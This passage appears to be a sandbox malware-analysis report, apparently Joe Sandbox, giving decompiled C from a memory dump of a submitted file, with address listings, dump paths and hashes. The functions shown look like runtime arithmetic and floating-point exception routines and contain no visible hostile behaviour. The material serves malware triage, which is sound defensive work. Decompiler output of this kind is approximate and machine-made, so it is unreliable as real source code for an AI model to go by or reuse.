                                                											}
                                                											_t291 =  *(_t189 + 4);
                                                											_t241 = _t257;
                                                											_t190 =  *_t189;
                                                											_v76 = _t257;
                                                											_v56 = 0;
                                                											_v20 = _t190;
                                                											__eflags = _t312;
                                                											if(_t312 != 0) {
                                                												_t298 = _t241;
                                                												_t212 = E001C6170(_t291, _v12, _t298);
                                                												_t257 = _v12;
                                                												_t241 = _t298;
                                                												_t291 = _t190 >> _v40 | _t212;
                                                												_t332 = _v20 << _t257;
                                                												__eflags = _v48 - 3;
                                                												_v20 = _t332;
                                                												if(_v48 >= 3) {
                                                													_t257 = _v40;
                                                													_t332 = _t332 |  *(_v28 - 4) >> _t257;
                                                													__eflags = _t332;
                                                													_v20 = _t332;
                                                												}
                                                											}
                                                											_push(_t241);
                                                											_t191 = E001C60D0(_t291, _t241, _v44, 0);
                                                											_v56 = _t241;
                                                											_t243 = _t191;
                                                											_t334 = _t332 ^ _t332;
                                                											_t192 = _t291;
                                                											_v24 = _t243;
                                                											_v16 = _t192;
                                                											_t314 = _t257;
                                                											_v68 = _t243;
                                                											_v64 = _t192;
                                                											_v56 = _t334;
                                                											__eflags = _t192;
                                                											if(_t192 != 0) {
                                                												L37:
                                                												_t244 = _t243 + 1;
                                                												asm("adc eax, 0xffffffff");
                                                												_t314 = _t314 + E001A9D20(_t244, _t192, _v44, 0);
                                                												asm("adc esi, edx");
                                                												_t243 = _t244 | 0xffffffff;
                                                												_t192 = 0;
                                                												__eflags = 0;
                                                												_v56 = _t334;
                                                												_v24 = _t243;
                                                												_v68 = _t243;
                                                												_v16 = 0;
                                                												_v64 = 0;
                                                											} else {
                                                												__eflags = _t243 - 0xffffffff;
                                                												if(_t243 > 0xffffffff) {
                                                													goto L37;
                                                												}
                                                											}
                                                											__eflags = _t334;
                                                											if(__eflags <= 0) {
                                                												if(__eflags < 0) {
                                                													goto L42;
                                                												} else {
                                                													__eflags = _t314 - 0xffffffff;
                                                													if(_t314 <= 0xffffffff) {
                                                														while(1) {
                                                															L42:
                                                															_v24 = _v20;
                                                															_t210 = E001A9D20(_v36, 0, _t243, _t192);
                                                															__eflags = _t291 - _t314;
                                                															if(__eflags < 0) {
                                                																break;
                                                															}
                                                															if(__eflags > 0) {
                                                																L45:
                                                																_t192 = _v16;
                                                																_t243 = _t243 + 0xffffffff;
                                                																_v68 = _t243;
                                                																asm("adc eax, 0xffffffff");
                                                																_t314 = _t314 + _v44;
                                                																__eflags = _t314;
                                                																_v16 = _t192;
                                                																asm("adc dword [ebp-0x34], 0x0");
                                                																_v64 = _t192;
                                                																if(_t314 == 0) {
                                                																	__eflags = _t314 - 0xffffffff;
                                                																	if(_t314 <= 0xffffffff) {
                                                																		continue;
                                                																	} else {
                                                																	}
                                                																}
                                                															} else {
                                                																__eflags = _t210 - _v24;
                                                																if(_t210 <= _v24) {
                                                																	break;
                                                																} else {
                                                																	goto L45;
                                                																}
                                                															}
                                                															L49:
                                                															_v24 = _t243;
                                                															goto L50;
                                                														}
                                                														_t192 = _v16;
                                                														goto L49;
                                                													}
                                                												}
                                                											}
                                                											L50:
                                                											__eflags = _t192;
                                                											if(_t192 != 0) {
                                                												L52:
                                                												_t258 = _v72;
                                                												_t315 = 0;
                                                												_t335 = 0;
                                                												__eflags = _t258;
                                                												if(_t258 != 0) {
                                                													_t246 = _v52;
                                                													_t201 = _a8 + 4;
                                                													__eflags = _t201;
                                                													_v56 = _t201;
                                                													_v20 = _t258;
                                                													do {
                                                														_v8 =  *_t201;
                                                														_t207 =  *_t246;
                                                														_t264 = _t315 + _v68 * _v8;
                                                														asm("adc esi, edx");
                                                														_t315 = _t335;
                                                														_t335 = 0;
                                                														__eflags = _t207 - _t264;
                                                														if(_t207 < _t264) {
                                                															_t315 = _t315 + 1;
                                                															asm("adc esi, esi");
                                                														}
                                                														 *_t246 = _t207 - _t264;
                                                														_t246 = _t246 + 4;
                                                														_t201 = _v56 + 4;
                                                														_t143 =  &_v20;
                                                														 *_t143 = _v20 - 1;
                                                														__eflags =  *_t143;
                                                														_v56 = _t201;
                                                													} while ( *_t143 != 0);
                                                													_t243 = _v24;
                                                													_t258 = _v72;
                                                												}
                                                												__eflags = 0 - _t335;
                                                												if(__eflags <= 0) {
                                                													if(__eflags < 0) {
                                                														L61:
                                                														__eflags = _t258;
                                                														if(_t258 != 0) {
                                                															_t245 = 0;
                                                															_t294 = _v52;
                                                															_t340 = _a8 + 4;
                                                															__eflags = _t340;
                                                															_t316 = _t258;
                                                															do {
                                                																_t260 =  *_t294;
                                                																_t151 = _t340 + 4; // 0x8d8b5959
                                                																_t340 = _t151;
                                                																_t294 = _t294 + 4;
                                                																asm("adc eax, eax");
                                                																 *((intOrPtr*)(_t294 - 4)) = _t260 +  *((intOrPtr*)(_t340 - 4)) + _t245;
                                                																asm("adc eax, 0x0");
                                                																_t245 = 0;
                                                																_t316 = _t316 - 1;
                                                																__eflags = _t316;
                                                															} while (_t316 != 0);
                                                															_t243 = _v24;
                                                														}
                                                														_t243 = _t243 + 0xffffffff;
                                                														asm("adc dword [ebp-0xc], 0xffffffff");
                                                													} else {
                                                														__eflags = _v76 - _t315;
                                                														if(_v76 < _t315) {
                                                															goto L61;
                                                														}
                                                													}
                                                												}
                                                												_t259 = _v48;
                                                												_v8 = _t259 - 1;
                                                											} else {
                                                												__eflags = _t243;
                                                												if(_t243 == 0) {
                                                													_t259 = _v48;
                                                												} else {
                                                													goto L52;
                                                												}
                                                											}
                                                											_t332 = _v32;
                                                											_t312 = _v12;
                                                											asm("adc esi, 0x0");
                                                											_v32 = 0 + _t243;
                                                											_t293 = _v80 - 1;
                                                											_v52 = _v52 - 4;
                                                											_t256 = _t259 - 1;
                                                											_t189 = _v28 - 4;
                                                											_v80 = _t293;
                                                											_v48 = _t256;
                                                											_v28 = _t189;
                                                											__eflags = _t293;
                                                										} while (_t293 >= 0);
                                                									}
                                                									_t239 = _a4;
                                                									_t255 = _v8 + 1;
                                                									_t185 = _t255;
                                                									__eflags = _t185 -  *_t239;
                                                									if(_t185 <  *_t239) {
                                                										_t288 =  &(( &(_t239[1]))[_t185]);
                                                										do {
                                                											 *_t288 = 0;
                                                											_t288 =  &(_t288[1]);
                                                											_t185 = _t185 + 1;
                                                											__eflags = _t185 -  *_t239;
                                                										} while (_t185 <  *_t239);
                                                									}
                                                									 *_t239 = _t255;
                                                									__eflags = _t255;
                                                									if(_t255 != 0) {
                                                										while(1) {
                                                											__eflags = _t239[_t255];
                                                											if(_t239[_t255] != 0) {
                                                												goto L75;
                                                											}
                                                											_t255 = _t255 + 0xffffffff;
                                                											__eflags = _t255;
                                                											 *_t239 = _t255;
                                                											if(_t255 != 0) {
                                                												continue;
                                                											}
                                                											goto L75;
                                                										}
                                                									}
                                                									L75:
                                                									return _v32;
                                                								}
                                                							}
                                                						} else {
                                                							_t6 = _t237 + 4; // 0xfffff8a4
                                                							_t299 =  *_t6;
                                                							_v8 = _t299;
                                                							if(_t299 != 1) {
                                                								__eflags = _t252;
                                                								if(_t252 != 0) {
                                                									_t247 = 0;
                                                									_v12 = 0;
                                                									_t323 = 0;
                                                									_v28 = 0;
                                                									__eflags = _t252 - 0xffffffff;
                                                									if(_t252 != 0xffffffff) {
                                                										_t276 = _t252 + 1;
                                                										__eflags = _t276;
                                                										_t277 =  &(_t179[_t276]);
                                                										_v32 = _t277;
                                                										do {
                                                											_push(_t247);
                                                											_t227 = E001C60D0( *_t277, _t323, _t299, 0);
                                                											_v28 = _t247;
                                                											_t247 = _v12;
                                                											_t323 = _t277;
                                                											_v64 = _t299;
                                                											_v12 = 0 + _t227;
                                                											_t299 = _v8;
                                                											asm("adc ebx, 0x0");
                                                											_t277 = _v32 - 4;
                                                											_v32 = _t277;
                                                											_t329 = _t329 - 1;
                                                											__eflags = _t329;
                                                										} while (_t329 != 0);
                                                										_t179 = _a4;
                                                									}
                                                									_t36 =  &(_t179[1]); // 0x4
                                                									_t348 = _t36;
                                                									 *_t179 = 0;
                                                									_v544 = 0;
                                                									E001B1F5E(_t348, 0x1cc,  &_v540, 0);
                                                									_t223 = _v28;
                                                									_t300 = _a4;
                                                									__eflags = 0 - _t223;
                                                									 *_t348 = _t323;
                                                									asm("sbb ecx, ecx");
                                                									 *(_t300 + 8) = _t223;
                                                									__eflags =  ~0x00000000;
                                                									 *_t300 = 0xbadbae;
                                                									return _v12;
                                                								} else {
                                                									_t325 =  &(_t179[1]);
                                                									 *_t179 = _t252;
                                                									_v544 = _t252;
                                                									E001B1F5E(_t325, 0x1cc,  &_v540, _t252);
                                                									_t230 = _t179[1];
                                                									_t305 = _t230 % _v8;
                                                									 *_t325 = _t305;
                                                									__eflags = 0 - _t305;
                                                									asm("sbb ecx, ecx");
                                                									__eflags = 0;
                                                									 *_a4 =  ~0x00000000;
                                                									return _t230 / _v8;
                                                								}
                                                							} else {
                                                								 *_t179 = _t311;
                                                								_v544 = _t311;
                                                								E001B1F5E( &(_t179[1]), 0x1cc,  &_v540, _t311);
                                                								return _t179[1];
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}
























































































                                                0x001b26e5
                                                0x001b26f0
                                                0x001b26f5
                                                0x001b2b5d
                                                0x001b2b61
                                                0x001b2b67
                                                0x001b26fb
                                                0x001b26fb
                                                0x001b26fe
                                                0x001b2700
                                                0x001b2705
                                                0x00000000
                                                0x001b270b
                                                0x001b270b
                                                0x001b270b
                                                0x001b270e
                                                0x001b2711
                                                0x001b2714
                                                0x001b283b
                                                0x001b283d
                                                0x00000000
                                                0x001b2843
                                                0x001b2845
                                                0x001b2847
                                                0x001b2849
                                                0x001b284b
                                                0x001b2875
                                                0x001b2875
                                                0x001b2875
                                                0x001b284d
                                                0x001b2850
                                                0x001b2850
                                                0x001b2853
                                                0x001b2856
                                                0x001b2859
                                                0x001b2860
                                                0x001b2862
                                                0x001b2864
                                                0x00000000
                                                0x00000000
                                                0x001b2866
                                                0x001b2867
                                                0x001b286a
                                                0x001b286d
                                                0x001b286f
                                                0x00000000
                                                0x001b2871
                                                0x00000000
                                                0x001b2871
                                                0x00000000
                                                0x001b286f
                                                0x001b2873
                                                0x00000000
                                                0x00000000
                                                0x001b2873
                                                0x001b2876
                                                0x001b2876
                                                0x001b2878
                                                0x00000000
                                                0x001b287e
                                                0x001b287e
                                                0x001b2881
                                                0x001b2884
                                                0x001b2887
                                                0x001b2887
                                                0x001b288b
                                                0x001b288e
                                                0x001b2891
                                                0x001b2894
                                                0x001b289f
                                                0x001b2896
                                                0x001b289b
                                                0x001b289b
                                                0x001b28a9
                                                0x001b28ae
                                                0x001b28b1
                                                0x001b28b3
                                                0x001b28bc
                                                0x001b28be
                                                0x001b28c5
                                                0x001b28c8
                                                0x001b28cb
                                                0x001b28d3
                                                0x001b28d9
                                                0x001b28d9
                                                0x001b28d9
                                                0x001b28d9
                                                0x001b28cb
                                                0x001b28dc
                                                0x001b28de
                                                0x001b28e5
                                                0x001b28e5
                                                0x001b28e8
                                                0x001b28eb
                                                0x001b28f1
                                                0x001b28f4
                                                0x001b28f8
                                                0x001b2901
                                                0x001b2904
                                                0x001b2904
                                                0x001b2907
                                                0x001b2910
                                                0x001b2910
                                                0x001b2913
                                                0x001b291a
                                                0x001b291a
                                                0x001b2915
                                                0x001b2915
                                                0x001b2915
                                                0x001b291c
                                                0x001b291f
                                                0x001b2921
                                                0x001b2923
                                                0x001b2926
                                                0x001b292d
                                                0x001b2930
                                                0x001b2932
                                                0x001b2940
                                                0x001b2944
                                                0x001b2949
                                                0x001b294e
                                                0x001b2955
                                                0x001b2957
                                                0x001b2959
                                                0x001b295d
                                                0x001b2960
                                                0x001b2965
                                                0x001b296d
                                                0x001b296d
                                                0x001b296f
                                                0x001b296f
                                                0x001b2960
                                                0x001b2972
                                                0x001b297a
                                                0x001b297f
                                                0x001b2984
                                                0x001b2986
                                                0x001b2988
                                                0x001b298a
                                                0x001b298d
                                                0x001b2990
                                                0x001b2992
                                                0x001b2995
                                                0x001b2998
                                                0x001b299b
                                                0x001b299d
                                                0x001b29a4
                                                0x001b29a9
                                                0x001b29ac
                                                0x001b29b6
                                                0x001b29b8
                                                0x001b29ba
                                                0x001b29bd
                                                0x001b29bd
                                                0x001b29bf
                                                0x001b29c2
                                                0x001b29c5
                                                0x001b29c8
                                                0x001b29cb
                                                0x001b299f
                                                0x001b299f
                                                0x001b29a2
                                                0x00000000
                                                0x00000000
                                                0x001b29a2
                                                0x001b29ce
                                                0x001b29d0
                                                0x001b29d2
                                                0x00000000
                                                0x001b29d4
                                                0x001b29d4
                                                0x001b29d7
                                                0x001b29e0
                                                0x001b29e0
                                                0x001b29ee
                                                0x001b29f1
                                                0x001b29f6
                                                0x001b29f8
                                                0x00000000
                                                0x00000000
                                                0x001b29fa
                                                0x001b2a01
                                                0x001b2a01
                                                0x001b2a04
                                                0x001b2a07
                                                0x001b2a0a
                                                0x001b2a0d
                                                0x001b2a0d
                                                0x001b2a10
                                                0x001b2a13
                                                0x001b2a17
                                                0x001b2a1a
                                                0x001b2a1c
                                                0x001b2a1f
                                                0x00000000
                                                0x00000000
                                                0x001b2a21
                                                0x001b2a1f
                                                0x001b29fc
                                                0x001b29fc
                                                0x001b29ff
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001b29ff
                                                0x001b2a26
                                                0x001b2a26
                                                0x00000000
                                                0x001b2a26
                                                0x001b2a23
                                                0x00000000
                                                0x001b2a23
                                                0x001b29d7
                                                0x001b29d2
                                                0x001b2a29
                                                0x001b2a29
                                                0x001b2a2b
                                                0x001b2a35
                                                0x001b2a35
                                                0x001b2a38
                                                0x001b2a3a
                                                0x001b2a3c
                                                0x001b2a3e
                                                0x001b2a43
                                                0x001b2a46
                                                0x001b2a46
                                                0x001b2a49
                                                0x001b2a4c
                                                0x001b2a50
                                                0x001b2a52
                                                0x001b2a67
                                                0x001b2a69
                                                0x001b2a6b
                                                0x001b2a6d
                                                0x001b2a6f
                                                0x001b2a71
                                                0x001b2a73
                                                0x001b2a75
                                                0x001b2a78
                                                0x001b2a78
                                                0x001b2a7c
                                                0x001b2a7e
                                                0x001b2a84
                                                0x001b2a87
                                                0x001b2a87
                                                0x001b2a87
                                                0x001b2a8b
                                                0x001b2a8b
                                                0x001b2a90
                                                0x001b2a93
                                                0x001b2a93
                                                0x001b2a98
                                                0x001b2a9a
                                                0x001b2a9c
                                                0x001b2aa3
                                                0x001b2aa3
                                                0x001b2aa5
                                                0x001b2aaa
                                                0x001b2aac
                                                0x001b2aaf
                                                0x001b2aaf
                                                0x001b2ab2
                                                0x001b2ab4
                                                0x001b2ab4
                                                0x001b2ab6
                                                0x001b2ab6
                                                0x001b2abb
                                                0x001b2ac1
                                                0x001b2ac5
                                                0x001b2ac8
                                                0x001b2acb
                                                0x001b2acd
                                                0x001b2acd
                                                0x001b2acd
                                                0x001b2ad2
                                                0x001b2ad2
                                                0x001b2ad5
                                                0x001b2ad8
                                                0x001b2a9e
                                                0x001b2a9e
                                                0x001b2aa1
                                                0x00000000
                                                0x00000000
                                                0x001b2aa1
                                                0x001b2a9c
                                                0x001b2adc
                                                0x001b2ae2
                                                0x001b2a2d
                                                0x001b2a2d
                                                0x001b2a2f
                                                0x001b2ae7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001b2a2f
                                                0x001b2aea
                                                0x001b2af4
                                                0x001b2af7
                                                0x001b2afa
                                                0x001b2b00
                                                0x001b2b01
                                                0x001b2b05
                                                0x001b2b06
                                                0x001b2b09
                                                0x001b2b0c
                                                0x001b2b0f
                                                0x001b2b12
                                                0x001b2b12
                                                0x001b2910
                                                0x001b2b1d
                                                0x001b2b20
                                                0x001b2b21
                                                0x001b2b23
                                                0x001b2b25
                                                0x001b2b2a
                                                0x001b2b30
                                                0x001b2b30
                                                0x001b2b36
                                                0x001b2b39
                                                0x001b2b3a
                                                0x001b2b3a
                                                0x001b2b30
                                                0x001b2b3e
                                                0x001b2b40
                                                0x001b2b42
                                                0x001b2b44
                                                0x001b2b44
                                                0x001b2b48
                                                0x00000000
                                                0x00000000
                                                0x001b2b4a
                                                0x001b2b4a
                                                0x001b2b4d
                                                0x001b2b4f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001b2b4f
                                                0x001b2b44
                                                0x001b2b51
                                                0x001b2b5c
                                                0x001b2b5c
                                                0x001b2878
                                                0x001b271a
                                                0x001b271a
                                                0x001b271a
                                                0x001b271d
                                                0x001b2723
                                                0x001b2754
                                                0x001b2756
                                                0x001b279b
                                                0x001b279d
                                                0x001b27a4
                                                0x001b27a6
                                                0x001b27a9
                                                0x001b27ac
                                                0x001b27ae
                                                0x001b27ae
                                                0x001b27af
                                                0x001b27b2
                                                0x001b27b5
                                                0x001b27b5
                                                0x001b27bf
                                                0x001b27c4
                                                0x001b27c9
                                                0x001b27cc
                                                0x001b27d1
                                                0x001b27d8
                                                0x001b27db
                                                0x001b27de
                                                0x001b27e1
                                                0x001b27e4
                                                0x001b27e7
                                                0x001b27e7
                                                0x001b27e7
                                                0x001b27ec
                                                0x001b27ec
                                                0x001b27ef
                                                0x001b27ef
                                                0x001b27f2
                                                0x001b2800
                                                0x001b2811
                                                0x001b2816
                                                0x001b281c
                                                0x001b2821
                                                0x001b2823
                                                0x001b2825
                                                0x001b2829
                                                0x001b282f
                                                0x001b2831
                                                0x001b283a
                                                0x001b2758
                                                0x001b275b
                                                0x001b275f
                                                0x001b276e
                                                0x001b2774
                                                0x001b2779
                                                0x001b277d
                                                0x001b2788
                                                0x001b278a
                                                0x001b278c
                                                0x001b2790
                                                0x001b2793
                                                0x001b279a
                                                0x001b279a
                                                0x001b2725
                                                0x001b272b
                                                0x001b273b
                                                0x001b2741
                                                0x001b2753
                                                0x001b2753
                                                0x001b2723
                                                0x001b2714
                                                0x001b2705

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72baab00484ba96210224a5428e3a330a8bc59586f0feaab5972f7056957d12f
                                                • Instruction ID: 44adf5a9e323ecc4ad6c3e6bd48a32e2797fc42a0b813bd65c5d02ad1ab695a1
                                                • Opcode Fuzzy Hash: 72baab00484ba96210224a5428e3a330a8bc59586f0feaab5972f7056957d12f
                                                • Instruction Fuzzy Hash: C7F13E71E002199FDF14CFA9C990AEDB7B1FF88314F158269E819AB390D730AD45CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E001B80B5(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                                				signed int _t172;
                                                				signed int _t175;
                                                				signed int _t178;
                                                				signed int* _t179;
                                                				signed char _t193;
                                                				signed int _t196;
                                                				signed int _t200;
                                                				signed int _t203;
                                                				void* _t204;
                                                				void* _t207;
                                                				signed int _t210;
                                                				void* _t211;
                                                				signed int _t226;
                                                				unsigned int* _t241;
                                                				signed char _t243;
                                                				signed int* _t251;
                                                				unsigned int* _t257;
                                                				signed int* _t258;
                                                				signed char _t260;
                                                				long _t263;
                                                				signed int* _t266;
                                                
                                                				 *(_a4 + 4) = 0;
                                                				_t263 = 0xc000000d;
                                                				 *(_a4 + 8) = 0;
                                                				 *(_a4 + 0xc) = 0;
                                                				_t243 = _a12;
                                                				if((_t243 & 0x00000010) != 0) {
                                                					_t263 = 0xc000008f;
                                                					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                                				}
                                                				if((_t243 & 0x00000002) != 0) {
                                                					_t263 = 0xc0000093;
                                                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                                				}
                                                				if((_t243 & 0x00000001) != 0) {
                                                					_t263 = 0xc0000091;
                                                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                                				}
                                                				if((_t243 & 0x00000004) != 0) {
                                                					_t263 = 0xc000008e;
                                                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                				}
                                                				if((_t243 & 0x00000008) != 0) {
                                                					_t263 = 0xc0000090;
                                                					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                                				}
                                                				_t266 = _a8;
                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                                				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
                                                				_t260 = E001B86EB(_a4);
                                                				if((_t260 & 0x00000001) != 0) {
                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                                				}
                                                				if((_t260 & 0x00000004) != 0) {
                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                                				}
                                                				if((_t260 & 0x00000008) != 0) {
                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                                				}
                                                				if((_t260 & 0x00000010) != 0) {
                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                                				}
                                                				if((_t260 & 0x00000020) != 0) {
                                                					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                                				}
                                                				_t172 =  *_t266 & 0x00000c00;
                                                				if(_t172 == 0) {
                                                					 *_a4 =  *_a4 & 0xfffffffc;
                                                				} else {
                                                					if(_t172 == 0x400) {
                                                						_t258 = _a4;
                                                						_t226 =  *_t258 & 0xfffffffd | 1;
                                                						L26:
                                                						 *_t258 = _t226;
                                                						L29:
                                                						_t175 =  *_t266 & 0x00000300;
                                                						if(_t175 == 0) {
                                                							_t251 = _a4;
                                                							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
                                                							L35:
                                                							 *_t251 = _t178;
                                                							L36:
                                                							_t179 = _a4;
                                                							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                                							if(_a28 == 0) {
                                                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                                								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                								_t255 = _a4;
                                                								_t241 = _a24;
                                                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                                								 *(_a4 + 0x50) =  *_t241;
                                                							} else {
                                                								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                                								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                                								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                								_t241 = _a24;
                                                								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                                								 *(_a4 + 0x50) =  *_t241;
                                                							}
                                                							E001B8657(_t255);
                                                							RaiseException(_t263, 0, 1,  &_a4);
                                                							_t257 = _a4;
                                                							_t193 = _t257[2];
                                                							if((_t193 & 0x00000010) != 0) {
                                                								 *_t266 =  *_t266 & 0xfffffffe;
                                                								_t193 = _t257[2];
                                                							}
                                                							if((_t193 & 0x00000008) != 0) {
                                                								 *_t266 =  *_t266 & 0xfffffffb;
                                                								_t193 = _t257[2];
                                                							}
                                                							if((_t193 & 0x00000004) != 0) {
                                                								 *_t266 =  *_t266 & 0xfffffff7;
                                                								_t193 = _t257[2];
                                                							}
                                                							if((_t193 & 0x00000002) != 0) {
                                                								 *_t266 =  *_t266 & 0xffffffef;
                                                								_t193 = _t257[2];
                                                							}
                                                							if((_t193 & 0x00000001) != 0) {
                                                								 *_t266 =  *_t266 & 0xffffffdf;
                                                							}
                                                							_t196 =  *_t257 & 0x00000003;
                                                							if(_t196 == 0) {
                                                								 *_t266 =  *_t266 & 0xfffff3ff;
                                                							} else {
                                                								_t207 = _t196 - 1;
                                                								if(_t207 == 0) {
                                                									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
                                                									L55:
                                                									 *_t266 = _t210;
                                                									L58:
                                                									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
                                                									if(_t200 == 0) {
                                                										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
                                                										L64:
                                                										 *_t266 = _t203;
                                                										L65:
                                                										if(_a28 == 0) {
                                                											 *_t241 = _t257[0x14];
                                                										} else {
                                                											 *_t241 = _t257[0x14];
                                                										}
                                                										return _t203;
                                                									}
                                                									_t204 = _t200 - 1;
                                                									if(_t204 == 0) {
                                                										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
                                                										goto L64;
                                                									}
                                                									_t203 = _t204 - 1;
                                                									if(_t203 == 0) {
                                                										 *_t266 =  *_t266 & 0xfffff3ff;
                                                									}
                                                									goto L65;
                                                								}
                                                								_t211 = _t207 - 1;
                                                								if(_t211 == 0) {
                                                									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
                                                									goto L55;
                                                								}
                                                								if(_t211 == 1) {
                                                									 *_t266 =  *_t266 | 0x00000c00;
                                                								}
                                                							}
                                                							goto L58;
                                                						}
                                                						if(_t175 == 0x200) {
                                                							_t251 = _a4;
                                                							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
                                                							goto L35;
                                                						}
                                                						if(_t175 == 0x300) {
                                                							 *_a4 =  *_a4 & 0xffffffe3;
                                                						}
                                                						goto L36;
                                                					}
                                                					if(_t172 == 0x800) {
                                                						_t258 = _a4;
                                                						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
                                                						goto L26;
                                                					}
                                                					if(_t172 == 0xc00) {
                                                						 *_a4 =  *_a4 | 0x00000003;
                                                					}
                                                				}
                                                			}
























                                                0x001b80c3
                                                0x001b80ca
                                                0x001b80cf
                                                0x001b80d5
                                                0x001b80d8
                                                0x001b80de
                                                0x001b80e3
                                                0x001b80e8
                                                0x001b80e8
                                                0x001b80ee
                                                0x001b80f3
                                                0x001b80f8
                                                0x001b80f8
                                                0x001b80ff
                                                0x001b8104
                                                0x001b8109
                                                0x001b8109
                                                0x001b8110
                                                0x001b8115
                                                0x001b811a
                                                0x001b811a
                                                0x001b8121
                                                0x001b8126
                                                0x001b812b
                                                0x001b812b
                                                0x001b8133
                                                0x001b8143
                                                0x001b8155
                                                0x001b8167
                                                0x001b817a
                                                0x001b818c
                                                0x001b8194
                                                0x001b8199
                                                0x001b819e
                                                0x001b819e
                                                0x001b81a5
                                                0x001b81aa
                                                0x001b81aa
                                                0x001b81b1
                                                0x001b81b6
                                                0x001b81b6
                                                0x001b81bd
                                                0x001b81c2
                                                0x001b81c2
                                                0x001b81c9
                                                0x001b81ce
                                                0x001b81ce
                                                0x001b81d8
                                                0x001b81da
                                                0x001b8214
                                                0x001b81dc
                                                0x001b81e1
                                                0x001b8205
                                                0x001b820d
                                                0x001b8201
                                                0x001b8201
                                                0x001b8217
                                                0x001b821e
                                                0x001b8220
                                                0x001b8242
                                                0x001b824a
                                                0x001b824d
                                                0x001b824d
                                                0x001b824f
                                                0x001b824f
                                                0x001b825a
                                                0x001b8260
                                                0x001b8265
                                                0x001b826c
                                                0x001b82a6
                                                0x001b82b1
                                                0x001b82b7
                                                0x001b82ba
                                                0x001b82bd
                                                0x001b82c9
                                                0x001b82d1
                                                0x001b826e
                                                0x001b8271
                                                0x001b827d
                                                0x001b8283
                                                0x001b8289
                                                0x001b828c
                                                0x001b8295
                                                0x001b8295
                                                0x001b82d4
                                                0x001b82e2
                                                0x001b82e8
                                                0x001b82eb
                                                0x001b82f0
                                                0x001b82f2
                                                0x001b82f5
                                                0x001b82f5
                                                0x001b82fa
                                                0x001b82fc
                                                0x001b82ff
                                                0x001b82ff
                                                0x001b8304
                                                0x001b8306
                                                0x001b8309
                                                0x001b8309
                                                0x001b830e
                                                0x001b8310
                                                0x001b8313
                                                0x001b8313
                                                0x001b8318
                                                0x001b831a
                                                0x001b831a
                                                0x001b8327
                                                0x001b832a
                                                0x001b8361
                                                0x001b832c
                                                0x001b832c
                                                0x001b832f
                                                0x001b835a
                                                0x001b834f
                                                0x001b834f
                                                0x001b8363
                                                0x001b836b
                                                0x001b836e
                                                0x001b838d
                                                0x001b8392
                                                0x001b8392
                                                0x001b8394
                                                0x001b8399
                                                0x001b83a5
                                                0x001b839b
                                                0x001b839e
                                                0x001b839e
                                                0x001b83aa
                                                0x001b83aa
                                                0x001b8370
                                                0x001b8373
                                                0x001b8382
                                                0x00000000
                                                0x001b8382
                                                0x001b8375
                                                0x001b8378
                                                0x001b837a
                                                0x001b837a
                                                0x00000000
                                                0x001b8378
                                                0x001b8331
                                                0x001b8334
                                                0x001b834a
                                                0x00000000
